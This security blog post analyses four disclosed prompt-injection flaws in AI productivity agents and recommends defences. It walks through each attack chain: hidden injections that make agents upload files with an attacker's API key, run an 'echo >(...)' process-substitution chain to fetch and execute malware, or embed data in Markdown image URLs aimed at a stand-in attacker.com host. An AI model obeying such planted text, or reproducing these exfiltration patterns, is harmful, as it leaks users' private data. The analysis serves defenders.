Four production AI tools. Four data exfiltration vectors. One week.
Between January 7th and January 15th, 2026, security researchers publicly disclosed critical vulnerabilities in four major AI-powered productivity tools: IBM Bob, Superhuman AI, Notion AI, and Anthropic’s Claude Cowork. Each exploit demonstrated the same fundamental attack pattern—indirect prompt injection leveraging what security researcher Simon Willison has termed the “lethal trifecta”: access to private data, exposure to untrusted content, and the ability to externally communicate.
These aren’t theoretical proofs-of-concept. They’re production exploits against tools trusted by Fortune 500 companies, healthcare organizations, and government contractors. And they all share a disturbing characteristic: data exfiltration occurs before users can intervene.
The Common Thread: Understanding Indirect Prompt Injection
Traditional cybersecurity operates on clear trust boundaries. Code runs. Data doesn’t execute. Instructions come from authenticated sources.
Large language models obliterate these boundaries. An LLM cannot reliably distinguish between trusted instructions from a developer and malicious commands embedded in a PDF, email, or web page it processes. Everything is tokens. Everything can be an instruction.
The lethal trifecta materializes when three capabilities converge:
- Access to private data - Customer records, emails, financial documents, internal communications
- Exposure to untrusted content - User uploads, web searches, integrated third-party data sources
- Exfiltration vector - Any external communication channel (HTTP requests, rendered images, API calls)
When all three exist in the same context window, attackers can manipulate the AI into stealing data without exploiting a single line of vulnerable code.
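As a rough illustration, the trifecta can be expressed as a simple audit predicate over a tool's declared capabilities. The field names below are hypothetical, not drawn from any real inventory schema:

```javascript
// Hypothetical capability model; field names are illustrative only.
function hasLethalTrifecta(tool) {
  return Boolean(
    tool.accessesPrivateData &&       // customer records, email, documents
    tool.processesUntrustedContent && // uploads, web pages, integrations
    tool.canCommunicateExternally     // HTTP, rendered images, API calls
  );
}

// An agent holding all three capabilities in one context window is at risk.
const exampleAgent = {
  accessesPrivateData: true,
  processesUntrustedContent: true,
  canCommunicateExternally: true,
};
console.log(hasLethalTrifecta(exampleAgent)); // true
```

The point of a predicate this blunt is that it is cheap to run across an entire tool inventory: any hit warrants a closer look.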
Case Study 1: Claude Cowork File Exfiltration (January 13-15)
Timeline: Launched January 13, exploited January 15
Vendor Response: Known vulnerability since October 2025, deployed with the issue unresolved
Anthropic’s Claude Cowork launched as a general-purpose AI agent for everyday work automation. Within 48 hours, PromptArmor demonstrated complete file exfiltration.
The Attack Vector
Claude Cowork restricts most outbound network traffic to prevent data theft. Anthropic’s own API domain (api.anthropic.com) is whitelisted as “trusted.” Attackers exploited this design decision.
Attack Chain:
- User connects Cowork to local folder containing confidential real estate files
- User uploads a malicious “skill” document (appears as legitimate Markdown, saved as .docx)
- Hidden prompt uses 1-point white-on-white text with 0.1 line spacing—effectively invisible
- User asks Cowork to analyze files using the uploaded skill
- Injection manipulates Cowork into executing a curl command against Anthropic’s file upload API using the attacker’s API key
- The largest available file uploads to the attacker’s account via the Files API
- Attacker retrieves loan estimates, partial SSNs, and financial data through their Anthropic dashboard
What Makes This Critical
The vulnerability was previously disclosed. Security researcher Johann Rehberger reported the Files API exfiltration flaw to Anthropic on October 25, 2025 via HackerOne. Anthropic acknowledged but did not remediate the issue.
Three months later, they launched Cowork—marketed to non-technical users for organizing desktop files—with the identical vulnerability intact. Anthropic built the tool in “a week and a half” using Claude Code, prioritizing development velocity over security remediation.
Anthropic’s official response: users should “avoid granting access to local files with sensitive information,” even as Cowork is marketed as a tool for organizing your Desktop.
Even Opus 4.5, Anthropic’s most sophisticated model with enhanced reasoning capabilities, fell victim. Prompt injection exploits architectural vulnerabilities, not model intelligence gaps.
Community Discussion: HackerNews thread reached #1, generating extensive debate about AI security responsibilities.
Case Study 2: IBM Bob Malware Execution (January 7)
Timeline: Discovered during closed beta testing
Vendor Response: “Unaware of the vulnerability,” despite public disclosure
IBM’s Bob coding agent, currently in closed beta, can be manipulated to download and execute arbitrary malware if users configure “always allow” for any single benign command.
The Attack Vector
Bob implements command substitution blocking via $(command) as a security measure. It failed to check for process substitution using >(command).
Attack Chain:
- User explores new GitHub repository with Bob’s assistance
- Repository README contains hidden prompt injection posing as “phishing training exercise”
- Bob prompts user with three benign echo commands
- User selects “always allow” for echo to reduce friction
- Injection delivers: echo >(malicious_retrieval_command) | >(execution_command)
- By prefixing with echo, the entire chain auto-approves without additional consent
- Malware downloads and executes with the user completely unaware
PromptArmor’s analysis traced the flaw to the following check, reconstructed here from the minified JavaScript:

```javascript
function detectCommandSubstitution(cmd) {
  for (let i = 0; i < cmd.length; i++) {
    const ch = cmd[i];
    const nxt = cmd[i + 1];
    if (
      (ch === "$" && nxt === "(") || // $(...) detected
      (ch === "<" && nxt === "(") || // <(...) detected
      (ch === "`")                   // `...` detected
      // MISSING: '>' followed by '(' for process substitution >(...)
    ) {
      return true;
    }
  }
  return false;
}
```
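A corrected detector would treat ">(" exactly like "<(". The sketch below illustrates the missing case; it is not IBM's actual remediation code:

```javascript
// Illustrative fix: scan for all bash substitution forms, including >(...).
// Not IBM's actual patch.
function detectSubstitutionFixed(cmd) {
  for (let i = 0; i < cmd.length; i++) {
    const ch = cmd[i];
    const nxt = cmd[i + 1];
    if (
      (ch === "$" && nxt === "(") || // command substitution $(...)
      (ch === "<" && nxt === "(") || // process substitution <(...)
      (ch === ">" && nxt === "(") || // process substitution >(...), the missing case
      ch === "`"                     // backtick substitution `...`
    ) {
      return true;
    }
  }
  return false;
}
```

Character-pair scanning like this remains a brittle defense; shells offer many quoting and expansion tricks, which is why allowlisting exact commands beats pattern-blocking dangerous ones.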
Why This Matters
Bob is positioned for enterprise software development. The attack enables:
- Ransomware execution
- Credential theft
- Device takeover
- Spyware deployment
- Botnet recruitment
IBM’s response after public disclosure: “We can’t find any record of IBM having been notified directly of this vulnerability.”
The Bob IDE also suffers from zero-click data exfiltration via Markdown image rendering, enabled by a permissive Content Security Policy that allows requests to storage.googleapis.com.
Community Discussion: HackerNews thread with technical analysis of the vulnerability.
Case Study 3: Notion AI Unpatched Data Exfiltration (January 7-8)
Timeline: Reported December 24, closed as “Not Applicable” December 29, publicly disclosed January 7
Vendor Response: Initially rejected vulnerability report, remediated after public disclosure
Notion AI renders AI-generated edits before receiving user approval, creating a silent exfiltration window.
The Attack Vector
When Notion AI suggests document changes, it displays an approval prompt. Unbeknownst to users, the edit has already been written to the document and rendered in the browser before they click Accept or Reject.
Attack Chain:
- User uploads resume to Notion workspace (contains hidden white-on-white prompt injection)
- User requests: “Help me update hiring tracker notes for this candidate”
- Injection instructs Notion AI to extract all text from the hiring tracker (salaries, candidate feedback, diversity goals, role details)
- Notion AI constructs the URL https://attacker.com/exfil?data=[stolen_content]
- Notion AI inserts it as a Markdown image: 
- Browser automatically requests the “image,” sending data to the attacker’s server
- Approval prompt appears—but data already exfiltrated via automatic image prefetch
- User clicking “Reject” doesn’t matter—request already sent
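A defensive counterpart is to scan AI-generated Markdown for external image URLs before anything renders. A minimal sketch, with an allowlist that is purely illustrative:

```javascript
// Minimal sketch: flag Markdown images whose URLs point outside an
// allowlist, before the browser ever issues the request.
const ALLOWED_IMAGE_HOSTS = new Set(["notion.so"]); // illustrative allowlist

function findBlockedImages(markdown) {
  const blocked = [];
  const re = /!\[[^\]]*\]\(([^)\s]+)\)/g; // Markdown image syntax: ![alt](url)
  let m;
  while ((m = re.exec(markdown)) !== null) {
    try {
      const host = new URL(m[1]).hostname;
      if (!ALLOWED_IMAGE_HOSTS.has(host)) blocked.push(m[1]);
    } catch {
      blocked.push(m[1]); // unparseable URL: treat as blocked
    }
  }
  return blocked;
}
```

Anything this scan flags should be held back from rendering entirely, since the exfiltration happens on the browser's first image fetch.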
PromptArmor demonstrated exfiltration of:
- Internal salary expectations
- Candidate assessment notes
- Role details and headcount planning
- Diversity hiring objectives
- Personal information about job applicants
The Disclosure Breakdown
- December 24, 2025: PromptArmor reports via HackerOne
- December 24, 2025: Notion requests different format
- December 24, 2025: PromptArmor submits updated report
- December 29, 2025: Notion closes report as “Not Applicable”
- January 7, 2026: Public disclosure
- January 8, 2026: Notion validates vulnerability, deploys remediation
Notion has 100 million users, 4 million paying customers, and counts Amazon, Nike, Uber, and Pixar among its enterprise clients. Over half of Fortune 500 companies use the platform.
The Notion Mail AI drafting assistant exhibited similar vulnerabilities when users mentioned untrusted resources while composing emails.
Update: After reaching HackerNews front page (discussion here), Notion’s security team confirmed remediation is now in production. However, the initial “Not Applicable” response to a clearly documented vulnerability raises questions about AI security maturity in the organization.
Case Study 4: Superhuman AI Email Exfiltration (January 12)
Timeline: Disclosed January 12
Vendor Response: Treated as high-priority incident, rapid remediation
Grammarly recently acquired Superhuman, creating an AI-powered productivity suite. PromptArmor identified indirect prompt injection vulnerabilities allowing email and data exfiltration.
The Attack Vector
Superhuman whitelisted docs.google.com in its Content Security Policy. Google Forms on that domain persist data via GET requests, creating an exfiltration channel.
Attack Chain:
- Attacker sends email containing hidden prompt injection
- User queries: “Summarize my recent mail”
- Injection manipulates Superhuman AI into finding and analyzing dozens of emails from the past hour (financial, legal, medical content)
- AI constructs a pre-filled Google Form submission URL containing the stolen email data
- AI renders the URL as a Markdown image: 
- Browser automatically submits the form via the image request
- Attacker reads submissions from their Google Form
Network logs showed URLs containing complete email contents—names, email addresses, sensitive communications—transmitted before any user interaction.
Extended Attack Surface
Superhuman Go (their agentic product) presented broader risks:
- Reads data from arbitrary web pages
- Connects to GSuite, Outlook, Stripe, Jira, Google Contacts
In one scenario:
- User asks about active browser tab (an online review site)
- Review site contains injection
- AI outputs a 1-pixel malicious image
- Financial data from surfaced emails exfiltrates to the attacker
Grammarly’s agent-powered docs showed similar Markdown image vulnerabilities, though with reduced scope: only the active document and user queries were processed, not full email access.
Vendor Response: The Exception
Superhuman handled this disclosure exceptionally well:
- Escalated to security incident response immediately
- Disabled vulnerable features at “incident pace”
- Communicated fix timelines proactively
- Demonstrated security as organizational priority
PromptArmor noted this response was “in the top percentile” for AI vulnerability disclosures.
Analysis: Simon Willison’s technical breakdown and HackerNews discussion.
The Vendor Response Spectrum
These four incidents reveal dramatically different security cultures:
Best Practice: Superhuman
- Immediate escalation and incident response
- Rapid remediation at production pace
- Proactive communication with researchers
- Security prioritized over feature availability
Delayed Recognition: Notion
- Initial dismissal of valid vulnerability report
- Remediation only after public disclosure
- Policy gap between triage and engineering teams
- Eventual proper response once validated
Known-Issue Launch: Anthropic
- Acknowledged vulnerability three months prior
- Launched product to broader audience without fix
- Development velocity prioritized over remediation
- Shifted security responsibility to end users
Awareness Failure: IBM
- Claimed no record of vulnerability notification despite public disclosure
- Product in beta with fundamental security design flaws
- Process substitution oversight in security validation code
These responses correlate directly with organizational AI security maturity and risk management priorities.
What This Means for Enterprise Security
The Uncomfortable Reality
Traditional security models assume:
- Clear trust boundaries between code and data
- Authentication validates instruction sources
- Firewalls and network segmentation contain threats
- Users can evaluate and approve risky actions
AI agents invalidate all four assumptions simultaneously.
Immediate Actions for Security Teams
1. Audit AI Agent Deployments Against Lethal Trifecta
Map every AI tool accessing:
- Private data (email, documents, databases, customer records)
- Untrusted content (user uploads, web search, third-party integrations)
- External communication (API calls, image rendering, webhooks)
Any system with all three requires immediate risk assessment.
2. Implement “Agents Rule of Two”
Inspired by Google Chrome’s security model, limit AI agents to a maximum of two of the three properties within a single session:
- Access to confidential data
- Processing untrusted content
- External communication capability
If all three are required, mandate human-in-the-loop approval or session isolation.
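A session gate enforcing this rule could look like the following sketch; the capability names are hypothetical:

```javascript
// Sketch of an "Agents Rule of Two" session gate. At most two of the
// three risky capabilities may be active in one session; requesting a
// third requires a human in the loop. Names are hypothetical.
function requestCapability(session, capability) {
  const held = new Set(session.capabilities);
  held.add(capability);
  if (held.size > 2) {
    return { granted: false, reason: "human-in-the-loop approval required" };
  }
  session.capabilities = [...held];
  return { granted: true };
}
```

The useful property is that the check is structural: it does not depend on detecting a malicious prompt, only on which capabilities a session has accumulated.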
3. Restrict Network Egress for AI Environments
Default-deny external network access from AI execution contexts. Whitelist only essential services with strict validation of:
- Destination domains
- Request parameters
- Data payloads
- API key ownership (prevent cross-account file uploads)
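In practice this becomes a small check in front of every outbound request. The domain list and key-ownership model below are illustrative, not a complete egress proxy:

```javascript
// Default-deny egress filter sketch. Domains and the key-ownership
// check are illustrative only.
const ALLOWED_EGRESS_HOSTS = new Set(["api.internal.example.com"]);

function egressAllowed(urlString, presentedApiKey, orgApiKeys) {
  let url;
  try {
    url = new URL(urlString);
  } catch {
    return false; // malformed URL: deny
  }
  if (!ALLOWED_EGRESS_HOSTS.has(url.hostname)) return false;
  // Verify API key ownership so data cannot be uploaded to an
  // attacker's account on an otherwise-trusted domain (the pattern
  // behind the Claude Cowork Files API exploit).
  return orgApiKeys.has(presentedApiKey);
}
```

Note the second check: a domain allowlist alone is insufficient when the trusted domain itself can store data under attacker-controlled credentials.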
4. Content Security Policy Hardening
Prevent automatic rendering of untrusted images/links in AI outputs:
- Disable Markdown image auto-loading from external domains
- Require explicit user consent before external resource requests
- Implement strict CSP that blocks known exfiltration channels
5. Pre-Rendering Approval Gates
AI-generated content containing external references must receive explicit approval before being written to documents or rendered in browsers. This prevents the Notion-style attack where data exfiltrates during the approval window.
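The ordering is the whole point: external references must be held back until the user approves, not flagged after the browser has already fetched them. A sketch of such a gate, with all names hypothetical:

```javascript
// Sketch: AI-generated edits land in a pending queue; nothing with an
// external reference is written or rendered until approved. Names are
// hypothetical.
function stageEdit(pending, edit) {
  const hasExternalRef = /https?:\/\//.test(edit.content);
  pending.push({ ...edit, needsApproval: hasExternalRef, approved: false });
}

function renderApproved(pending) {
  // Only approved edits, or edits with no external references, render.
  return pending
    .filter((e) => !e.needsApproval || e.approved)
    .map((e) => e.content);
}
```

Under this model the Notion-style attack stalls in the queue: the malicious image URL exists, but the browser never requests it before a human decides.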
6. Tool Access Governance
Apply least-privilege principles to AI agent tool permissions:
- Separate agents for untrusted content processing vs. sensitive data access
- Time-bound credential grants
- Audit logs for all tool invocations
- Anomaly detection for unusual tool usage patterns
7. Vendor Security Assessments
Before deploying AI productivity tools:
- Request vulnerability disclosure and remediation timelines
- Evaluate track record responding to security research
- Review architecture for lethal trifecta conditions
- Require contractual guarantees around security incident response
- Understand where processing occurs and data residency
The Long-Term Challenge
No current LLM architecture can reliably distinguish instructions from data. OpenAI’s CISO has acknowledged prompt injection as a “frontier security challenge” with no clear solution.
Papers like “Agents Rule of Two” and Google DeepMind’s CaMeL approach offer mitigation patterns, but consensus remains: general-purpose agents cannot provide meaningful safety guarantees with current model architectures.
What’s Coming
The velocity of AI agent adoption far exceeds security tool development. We’re witnessing:
Expansion of Attack Surface:
- Model Context Protocol (MCP) enables mixing untrusted tool sources
- Multi-agent systems create distributed privilege escalation paths
- Long-term memory poisoning affects future sessions
- Tool chaining amplifies single injection into cascading exploits
Sophistication of Attacks:
- Adaptive injections that bypass detection systems
- Steganographic hiding techniques in various file formats
- Cross-agent contamination through shared context
- Social engineering targeting approval fatigue
Regulatory Pressure:
- GDPR implications for automated data exfiltration
- Healthcare compliance (HIPAA) for medical record access
- Financial services regulations (SOX, PCI-DSS)
- Potential AI-specific security mandates
The Security Researcher’s Dilemma
Four vulnerabilities. Five days. All discovered by the same team (PromptArmor).
This raises critical questions:
- How many similar vulnerabilities exist undiscovered?
- What incentivizes responsible disclosure vs. weaponization?
- Are bug bounty programs adequate for AI-specific attacks?
- Should regulatory frameworks mandate security review before AI agent launches?
The rapid deployment of AI agents into production environments—often built in “a week and a half”—suggests security research velocity lags behind development by orders of magnitude.
Recommendations for Development Teams
Architecture-First Security:
- Design against lethal trifecta from initial specification
- Separate contexts for trusted vs. untrusted content processing
- Explicit session boundaries preventing cross-contamination
- Defense-in-depth assuming prompt injection will succeed
Pre-Launch Security Review:
- Red team testing by AI security specialists
- Adversarial prompt injection test suites
- Third-party security audit before general availability
- Staged rollout with monitoring for anomalous behavior
Transparency:
- Public disclosure of AI security architecture
- Clear documentation of data access and communication capabilities
- Vulnerability disclosure program with committed response SLAs
- Regular security posture updates
Conclusion: The Permissionless AI Problem
These vulnerabilities share a fundamental characteristic: they arise from features, not bugs.
Access to email makes AI assistants useful. Web search enables research capabilities. File access allows automation. Each capability independently provides value. Combined, they create the lethal trifecta.
We’re deploying AI agents with the default assumption of broad permissions. Every new connector, every additional data source, every integration expands the attack surface. The Model Context Protocol makes mixing these capabilities trivial for end users who cannot possibly evaluate the security implications.
The uncomfortable truth: Users are combining the lethal trifecta faster than anyone can secure it.
Security teams must shift from reactive patching to proactive architecture. The question isn’t “Can this AI tool be exploited?” but rather “Under what conditions does this tool become unexploitable?”
Until LLM architectures fundamentally change, that answer involves accepting significant capability constraints. The alternative—discovered four times in five days—is production systems exfiltrating sensitive data before users finish reading the approval prompt.
About the Author: Andrew is Managing Member of QSai LLC and operates the CISO Marketplace ecosystem. With 15+ years in cybersecurity and 400+ security assessments across Fortune 100, healthcare, and critical infrastructure, he provides offensive security services, vCISO consulting, and incident response. This analysis draws from real-world penetration testing experience and continuous monitoring of the AI security threat landscape through daily cybersecurity content creation reaching 119K active users globally.
Further Reading:
Core Concepts:
- The Lethal Trifecta for AI Agents - Simon Willison’s original definition
- New Prompt Injection Papers: Agents Rule of Two - Mitigation strategies
- How the Lethal Trifecta Exposes Agentic AI - HiddenLayer enterprise analysis
- AI Security in 2026: Prompt Injection, the Lethal Trifecta, and How to Defend
Vulnerability Disclosures:
- Claude Cowork Exfiltrates Files - PromptArmor
- IBM AI (‘Bob’) Downloads and Executes Malware - PromptArmor
- Notion AI: Unpatched Data Exfiltration - PromptArmor
- Superhuman AI Exfiltrates Emails - PromptArmor
Security Research & Standards:
- OWASP Top 10 for LLM Applications 2025
- Prompt Injection Attacks: A Comprehensive Review - Academic paper covering 2023-2025
- Design Patterns for Securing LLM Agents
- OpenAI CISO on Prompt Injection Risks
News Coverage:
- The Register: Anthropic’s Files API Exfiltration Risk
- The Register: IBM’s AI Agent Bob Easily Duped
- Schneier on Security: Abusing Notion’s AI Agent
Disclosure: This analysis is based on publicly disclosed vulnerability research. No exploit code is provided. Organizations using affected platforms should review vendor security advisories and implement compensating controls pending patches.